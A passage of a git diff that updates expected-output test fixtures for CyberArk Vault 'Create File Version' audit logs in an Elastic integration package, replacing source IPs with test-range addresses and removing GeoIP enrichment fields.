Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_SSH.LiveSessions","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-14T12:57:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:27\n 2021-03-14T12:57:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PSMPApp_SSH\n Create File Version\n \n \n PSMPLiveSessions\n Root\\PSMPApp_SSH.LiveSessions\n 67.43.156.15\n \n \n \n \n \n Create File Version\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:27","IsoTimestamp":"2021-03-14T12:57:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_SSH.LiveSessions","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-62-create-file-version.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-62-create-file-version.log-expected.json index 7cb40182c36..f9982edaafc 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-62-create-file-version.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-62-create-file-version.log-expected.json @@ -7,20 +7,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -40,7 +28,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -50,7 +38,7 @@ "iso_timestamp": "2021-03-10T09:11:54Z", "file": "Root\\PSMPApp_localhost.localdomain.LiveSessions", "safe": "PSMPLiveSessions", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Create File Version", "message": "Create File Version", "issuer": "PSMPApp_localhost.localdomain", @@ -64,8 +52,8 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-06-09T10:24:36.502246900Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:54\",\"IsoTimestamp\":\"2021-03-10T09:11:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_localhost.localdomain\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_localhost.localdomain.LiveSessions\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:09.726762400Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:54\",\"IsoTimestamp\":\"2021-03-10T09:11:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_localhost.localdomain\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_localhost.localdomain.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", "code": "62", "kind": "event" } @@ -77,20 +65,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -110,7 +86,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -120,7 +96,7 @@ "iso_timestamp": "2021-03-10T17:58:05Z", "file": "Root\\SessionControl", "safe": "PSMNotifications", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Create File Version", "message": "Create File Version", "issuer": "Administrator", @@ -134,8 +110,8 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-06-09T10:24:36.502258900Z", - "original": "\u003c5\u003e1 2021-03-10T17:58:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:58:05\",\"IsoTimestamp\":\"2021-03-10T17:58:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMNotifications\",\"File\":\"Root\\\\SessionControl\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:09.726766Z", + "original": "\u003c5\u003e1 2021-03-10T17:58:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:58:05\",\"IsoTimestamp\":\"2021-03-10T17:58:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMNotifications\",\"File\":\"Root\\\\SessionControl\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", "code": "62", "kind": "event" } @@ -147,20 +123,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -180,7 +144,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -190,7 +154,7 @@ "iso_timestamp": "2021-03-10T18:46:47Z", "file": "Root\\PSMServer.LiveSessions", "safe": "PSMLiveSessions", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Create File Version", "message": "Create File Version", "issuer": "PSMApp_VAGRANT", @@ -204,8 +168,8 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-06-09T10:24:36.502260800Z", - "original": "\u003c5\u003e1 2021-03-10T18:46:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:47\",\"IsoTimestamp\":\"2021-03-10T18:46:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_VAGRANT\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSMServer.LiveSessions\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:09.726770700Z", + "original": "\u003c5\u003e1 2021-03-10T18:46:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:47\",\"IsoTimestamp\":\"2021-03-10T18:46:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_VAGRANT\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSMServer.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", "code": "62", "kind": "event" } @@ -217,19 +181,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -249,7 +202,7 @@ }, "related": { "ip": [ - "35.192.121.42" + "67.43.156.14" ] }, "cyberarkpas": { @@ -259,7 +212,7 @@ "iso_timestamp": "2021-03-10T22:20:12Z", "file": "Root\\PSM-ASR-CYBERARK-WI.LiveSessions", "safe": "PSMLiveSessions", - "station": "35.192.121.42", + "station": "67.43.156.14", "action": "Create File Version", "message": "Create File Version", "issuer": "PSMApp_ASR-WIN", @@ -273,8 +226,8 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-06-09T10:24:36.502262200Z", - "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI.LiveSessions\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:09.726776900Z", + "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI.LiveSessions\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", "code": "62", "kind": "event" } @@ -332,7 +285,7 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-06-09T10:24:36.502263800Z", + "ingested": "2021-12-09T13:37:09.726781900Z", "original": "\u003c5\u003e1 2021-03-11T16:50:29Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:50:29\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:50:29Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e62\u003c/MessageID\u003e\\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePVWAAppUser\u003c/Issuer\u003e\\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\ec7c3e3bd11069dd20a491a6b11bbe293bf4780b\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:50:29\",\"IsoTimestamp\":\"2021-03-11T16:50:29Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMSessions\",\"File\":\"Root\\\\ec7c3e3bd11069dd20a491a6b11bbe293bf4780b\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", "code": "62", "kind": "event" @@ -345,20 +298,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -378,7 +319,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -388,8 +329,8 @@ "iso_timestamp": "2021-03-11T16:59:58Z", "file": "Root\\PSMPApp_VAGRANT.LiveSessions", "safe": "PSMPLiveSessions", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:58\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:58Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e62\u003c/MessageID\u003e\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\n \u003cFile\u003eRoot\\PSMPApp_VAGRANT.LiveSessions\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:58\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:58Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e62\u003c/MessageID\u003e\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\n \u003cFile\u003eRoot\\PSMPApp_VAGRANT.LiveSessions\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Create File Version", "message": "Create File Version", "issuer": "PSMPApp_VAGRANT", @@ -403,8 +344,8 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-06-09T10:24:36.502265100Z", - "original": "\u003c5\u003e1 2021-03-11T16:59:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:58\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:58Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e62\u003c/MessageID\u003e\\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_VAGRANT.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:58\",\"IsoTimestamp\":\"2021-03-11T16:59:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_VAGRANT.LiveSessions\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:09.726787Z", + "original": "\u003c5\u003e1 2021-03-11T16:59:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:58\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:58Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e62\u003c/MessageID\u003e\\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_VAGRANT.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:58\",\"IsoTimestamp\":\"2021-03-11T16:59:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_VAGRANT.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", "code": "62", "kind": "event" } @@ -470,7 +411,7 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-06-09T10:24:36.502266400Z", + "ingested": "2021-12-09T13:37:09.726791100Z", "original": "\u003c5\u003e1 2021-03-14T12:07:32Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:07:32\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:07:32Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e62\u003c/MessageID\u003e\\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eAccountsFeedDiscoveryLogs\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Windows discovery from ELASTIC.local_PasswordManager_UID1.log\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:07:32\",\"IsoTimestamp\":\"2021-03-14T12:07:32Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"AccountsFeedDiscoveryLogs\",\"File\":\"Root\\\\Windows discovery from ELASTIC.local_PasswordManager_UID1.log\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "62", "kind": "event" @@ -483,17 +424,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -513,7 +445,7 @@ }, "related": { "ip": [ - "34.71.250.247" + "67.43.156.15" ] }, "cyberarkpas": { @@ -523,8 +455,8 @@ "iso_timestamp": "2021-03-14T12:57:27Z", "file": "Root\\PSMPApp_SSH.LiveSessions", "safe": "PSMPLiveSessions", - "station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:27\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:27Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n 